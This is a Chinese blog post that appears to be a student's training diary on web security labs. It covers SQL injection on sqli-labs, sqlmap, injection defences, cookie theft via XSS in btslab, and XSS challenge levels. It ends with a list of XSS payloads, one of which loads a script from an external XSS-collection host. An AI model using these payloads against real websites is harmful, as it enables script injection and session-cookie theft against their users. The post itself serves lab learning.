Loading... # 实训第三天 1. 虚拟机安装和配置sqli-labs 物理机访问: ![image-20220713103942581.png](http://xherlock.top/usr/uploads/2022/07/2205217167.png) 2. sqli-labs练习 Less-5:盲注 ![less-5-1.png](http://xherlock.top/usr/uploads/2022/07/1399656230.png) ![less-5-2.png](http://xherlock.top/usr/uploads/2022/07/2470864297.png) Less-7:文件注入 ![zhuru.png](http://xherlock.top/usr/uploads/2022/07/35471840.png) ![result.png](http://xherlock.top/usr/uploads/2022/07/2176714956.png) Less-9:延时注入 Less-5:报错注入,使用extravalue 爆出数据库名 ![less-5-db.png](http://xherlock.top/usr/uploads/2022/07/2096830628.png) 爆出数据表名 ![less-5-table.png](http://xherlock.top/usr/uploads/2022/07/2401353469.png) Less-11:post法+联合注入 ![less-11-col_num.png](http://xherlock.top/usr/uploads/2022/07/1313880253.png) ![less-11-db.png](http://xherlock.top/usr/uploads/2022/07/3094565880.png) ![less-11-table.png](http://xherlock.top/usr/uploads/2022/07/2466842354.png) Less-12:双引号+括号闭合 ![image-20220713141256904.png](http://xherlock.top/usr/uploads/2022/07/3208089665.png) 3. 初步了解sqlmap的使用 4. 了解sql注入 概念和原理:攻击者通过注入sql语句片段,导致后端执行预期外的sql查询 危害:1.拖库 2.读写文件 3.执行系统命令 防护思路:对输入的特殊字符进行转义;正确使用预编译技术进行防护;非必要不开启文件和命令执行权限;进行库和用户的权限隔离 5. 观看学习xss(cross site scripting)演示,学习xss的基本知识和攻击目的:攻击者嵌入自己的恶意js代码,使其他用户浏览器执行 6. 实战btslab练习XSS窃取cookie并利用 ![image-20220713154248802.png](http://xherlock.top/usr/uploads/2022/07/2145597382.png) 7. 编写有弹窗的页面 ![image-20220713155410356.png](http://xherlock.top/usr/uploads/2022/07/3245321956.png) 8. xss挑战 level-1:尝试用输入的js元素替换test,使得页面弹窗。 ![img](http://xherlock.top/usr/uploads/2022/07/2767204590.png) level-2:闭合input标签 ![](http://xherlock.top/usr/uploads/2022/07/1458305646.png) js的各种引入方式 ~~~ <script>alert(1);</script> //直接嵌入script <input name=keyword value="" onmouseover="alert(1)"> //通过事件属性值传入script字符串 <script src='https://xsspt.com/MQzN0Z'></script> //从远程嵌入script <a HREF=javascript:alert(1)>aaa</a> //超链接 或者:<a HREF=javascript:alert(1)>aaa</a> //html实体转义 <svg onload=alert(1)> <svg><script>alert(1)</script> ~~~ 最后修改:2022 年 07 月 13 日 © 允许规范转载 打赏 赞赏作者 支付宝微信 赞 0 如果觉得我的文章对你有用,请随意赞赏